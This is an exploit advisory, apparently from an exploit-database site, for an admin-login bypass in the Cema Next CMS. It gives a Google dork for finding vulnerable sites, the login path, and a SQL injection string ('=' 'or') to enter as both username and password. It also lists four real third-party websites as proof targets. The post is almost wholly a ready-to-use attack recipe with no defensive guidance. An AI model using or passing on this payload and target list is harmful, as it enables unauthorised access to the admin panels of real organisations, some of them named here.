Cema Next Bypass Admin Page Vulnerability

2017.01.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------In The Name Of God------------------------| |[+] Exploit Title: Cema Next Bypass Admin Page Vulnerability |[+] Exploit Author: Ashiyane Digital Security Team |[+] Vendor Homepage: http://www.cemanext.it/ |[+] Google Dork : intext:"powered by Cema Next" inurl:login.php |[+] Tested on: Windows 10 >> Mozilla Firefox |[+] Date: 1/19/2017 |[+]==========================================================| |[+] Then Choose a Target and put this after URL : /PATH/login.php |[+]=========| |[+] And fill username and password like the information below : |[+] Username : '=' 'or' |[+] Password : '=' 'or' |[+]==========================================================| |[+] Proof : |[+] http://www.alpiassociazione.it/gest/login.php |[+] http://www.agrifacile.it/gest/login.php |[+] http://www.meiandpartners.com/cms/login.php |[+] http://www.areataxi.net/AreaTaxiGestAd/login.php |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : HackFans |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top